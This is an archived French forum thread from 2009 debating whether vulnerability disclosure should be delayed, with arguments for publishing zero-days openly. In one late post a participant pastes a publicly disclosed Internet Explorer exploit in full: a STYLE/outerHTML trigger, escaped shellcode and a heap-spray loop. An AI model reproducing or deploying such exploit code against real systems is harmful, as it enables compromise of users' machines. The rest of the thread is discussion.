Invité jabial Posté 13 novembre 2009 Signaler Posté 13 novembre 2009 La politique "éthique" de diffusion des vulnérabilités informatique est stupide et contre-productive. Je résume pour les non-initiés : afin d'éviter de faciliter les actes malveillants, les failles de sécurité ne sont diffusées que lorsqu'elles ont d'ores et déjà été comblées, ou si l'éditeur du produit n'a pas comblé la faille dans un délai "raisonnable" (qui peut être très long). Ceci signifie que les administrateurs systèmes qui se reposent sur les diverses listes de diffusion des vulnérabilités informatiques placent très mal leur confiance, puisqu'ils croient qu'il n'existe pas de failles connues sur les logiciels qu'ils utilisent alors qu'en fait, elles existent et sont diffusées dans le milieu underground bien avant qu'elles soient diffusées aux administrateurs systèmes par les listes dites "grand public". Le fait que n'importe quel gamin de 13 ans puisse avoir accès aux forums "black hat" ne semble pas troubler la tranquillité d'esprit des promoteurs de ce qui n'est qu'une nouvelle variante de la sécurité par l'obscurité, pourtant décriée en privé par ces mêmes experts lorsqu'ils sont engagés pour faire du conseil en sécurité. Pourtant, même sans être très inventif, il n'est pas difficile d'indiquer qu'un produit est atteint par une faille majeure ou mineure sans donner les précisions permettant ne serait-ce qu'un début d'exploitation. Oui mais voilà : les éditeurs des produits vérolés ne veulent surtout pas que les entreprises prennent l'habitude de désactiver leur logiciel pour se protéger, et c'est ce qui arrive lorsqu'une faille majeure est annoncée alors qu'aucun patch n'est encore disponible. Les mesures de rétorsion employées contre les diffuseurs sont multiples : de la plus basique (ne plus leur envoyer les listes de patchs, les mettant ainsi à la remorque de la concurrence pour récupérer, mettre en forme et diffuser l'information) à la plus vicieuse (procès en diffamation en l'absence d'informations spécifiques, procès pour violation du DMCA et autres LCEN lorsque ces preuves sont bien là). Il n'existe donc qu'une seule façon de sortir de ce cercle vicieux, c'est la diffusion systématique par une source ouverte au public, mais hors de portée des procès (offshore), des failles zéro-day déjà accessibles sur les forums black-hat. Il faut un clone de wikileaks pour la sécurité informatique. Les éditeurs doivent cesser de se reposer sur la méconnaissance des failles exploitées de leurs produits par les utilisateurs pour assurer la sécurité… de leur image de marque.
Luis Posté 13 novembre 2009 Signaler Posté 13 novembre 2009 J'en conclurais de mon côté que les responsables IT doivent faire de la veille sur ces fameux forums "black hat".
neuneu2k Posté 13 novembre 2009 Signaler Posté 13 novembre 2009 jabial a dit : Il faut un clone de wikileaks pour la sécurité informatique. DO WANT !
Invité jabial Posté 13 novembre 2009 Signaler Posté 13 novembre 2009 Luis a dit : J'en conclurais de mon côté que les responsables IT doivent faire de la veille sur ces fameux forums "black hat". … et si ça se sait qu'il participe à ce type de forum il peut dire adieu à sa carrière. Ca me paraît plus que délicat.
Luis Posté 13 novembre 2009 Signaler Posté 13 novembre 2009 Je ne parle pas de participation mais de veille .
neuneu2k Posté 13 novembre 2009 Signaler Posté 13 novembre 2009 Luis a dit : Je ne parle pas de participation mais de veille . Ces forums sont plus proches de notre section habitués ou de nos chapelles que d’un gros forum grand public, il faut montrer patte blanche pour rentrer, et fournir soi même des outils et/ou informations confidentielles pour les parties les plus profondes.
jubal Posté 13 novembre 2009 Signaler Posté 13 novembre 2009 jabial a dit : Il n'existe donc qu'une seule façon de sortir de ce cercle vicieux, c'est la diffusion systématique par une source ouverte au public, mais hors de portée des procès (offshore), des failles zéro-day déjà accessibles sur les forums black-hat. Il faut un clone de wikileaks pour la sécurité informatique. Il n'y a pas de forum avec des 0days visible par tous. Une 0day c'est precieux, ca vaut de l'argent (quelques milliers de $ si elle est inutile, beaucoup plus si elle est utile), personne ne diffuse plus ses 0days. Il existe quelques mailing-list privees ou il arrive qu'il y ai des 0days publiees (comme vendor-sec par exemple), mais jamais sur un forum.
Luis Posté 13 novembre 2009 Signaler Posté 13 novembre 2009 neuneu2k a dit : Ces forums sont plus proches de notre section habitués ou de nos chapelles que d’un gros forum grand public, il faut montrer patte blanche pour rentrer, et fournir soi même des outils et/ou informations confidentielles pour les parties les plus profondes. A la réflexion, c'est vrai que le contraire aurait été étonnant. Et vu qu'il y a des histoires de gros sous…
Johnnieboy Posté 13 novembre 2009 Signaler Posté 13 novembre 2009 Je comprends rien a ce fil… En gros, c'est pas la faute de l'Etat, du collectivisme et du marxisme ?! C'est pas drôle alors.
Sloonz Posté 13 novembre 2009 Signaler Posté 13 novembre 2009 Johnnieboy a dit : Je comprends rien a ce fil… En gros, c'est pas la faute de l'Etat, du collectivisme et du marxisme ?! C'est pas drôle alors. C’est pour dénoncer un odieux vide législatif qui ne profite qu’aux méchantes entreprises d’informatique, afin que le public prenne conscience qu’il est urgent de le combler.
Hemrick Posté 13 novembre 2009 Signaler Posté 13 novembre 2009 Pour combler ce vide on pourrait créer un service public de la sécurité informatique ou bien une agence internationale placée sous la tutelle de l'ONU.
Bastiat Posté 14 novembre 2009 Signaler Posté 14 novembre 2009 Luis a dit : J'en conclurais de mon côté que les responsables IT doivent faire de la veille sur ces fameux forums "black hat". Plutôt les éditeurs. Illusoire d'espérer passer sur 300 serveurs ton patch "maison" après avoir gaspillé l'argent de ton employeur, a passer tes journées sur les forums. Responsable de la gestion des patch d'un grand nombre de serveurs critiques chez certains clients, je déploie tous les correctif validés par l'éditeur d'OS bien connu dans un délais de 3 semaines après leur sortie. De nombreuses actions sont auditées sur les domaines. Les anciennes pratiques, en principes gardées pour cause de compatibilité type authentification anonymes sont supprimées. Johnnieboy a dit : Je comprends rien a ce fil… En gros, c'est pas la faute de l'Etat, du collectivisme et du marxisme ?! C'est pas drôle alors. Pour changer on tape sur le "close-source". Hemrick a dit : Pour combler ce vide on pourrait créer un service public de la sécurité informatique ou bien une agence internationale placée sous la tutelle de l'ONU. Oui excellent idée, Chirac pourrait être à la tête de cette task force. http://www.youtube.com/watch?v=Edyp5gDnpRU En plus de sarkozy à la tête de la lutte contre le réchauffement climatique. http://www.dailymotion.com/video/xalft5_sa…zone-et-ef_news
Invité jabial Posté 22 novembre 2009 Signaler Posté 22 novembre 2009 jubal a dit : Il n'y a pas de forum avec des 0days visible par tous. Une 0day c'est precieux, ca vaut de l'argent (quelques milliers de $ si elle est inutile, beaucoup plus si elle est utile), personne ne diffuse plus ses 0days.Il existe quelques mailing-list privees ou il arrive qu'il y ai des 0days publiees (comme vendor-sec par exemple), mais jamais sur un forum. Evidemment je ne parle pas de forums publics, mais tu serais étonnés de connaître le niveau d'anglais déplorable dans des forums où des 0days sont bel et bien publiés. L'âge de certains participants, un minimun compétents techniquement (sans quoi ils n'auraient pas pu avoir l'accès), est facile à deviner.
ikichi Posté 22 novembre 2009 Signaler Posté 22 novembre 2009 Tout ça me fait penser à moi quand je jouais à l'apprenti hacker il y a quelques années…
Invité jabial Posté 22 novembre 2009 Signaler Posté 22 novembre 2009 Je pense qu'on a tous [tous les informaticiens] fait ça étant gamins. Tiens, ils sont en train de me faire mentir là pour une fois, mais faut dire que l'exploitation a été publiquement diffusée : http://seclists.org/bugtraq/2009/Nov/148 <script> function load(){ var e; e=document.getElementsByTagName("STYLE")[0]; e.outerHTML="1"; } </script> <STYLE type="text/css"> body{ overflow: scroll; margin: 0; } </style> <script language="javascript"> var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063"); var bigblock = unescape("%u9090%u9090"); var headersize = 20; var slackspace = headersize+shellcode.length; while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; memory = new Array(); for (x=0; x<4000; x++) memory[x] = block + shellcode; </script>
pankkake Posté 22 novembre 2009 Signaler Posté 22 novembre 2009 jabial a dit : Les éditeurs doivent cesser de se reposer sur la méconnaissance des failles exploitées de leurs produits par les utilisateurs pour assurer la sécurité… de leur image de marque. Clairement oui. Je sais même pas si on a vraiment évolué depuis http://fr.wikipedia.org/wiki/Serge_Humpich
Messages recommandés
Archivé
Ce sujet est désormais archivé et ne peut plus recevoir de nouvelles réponses.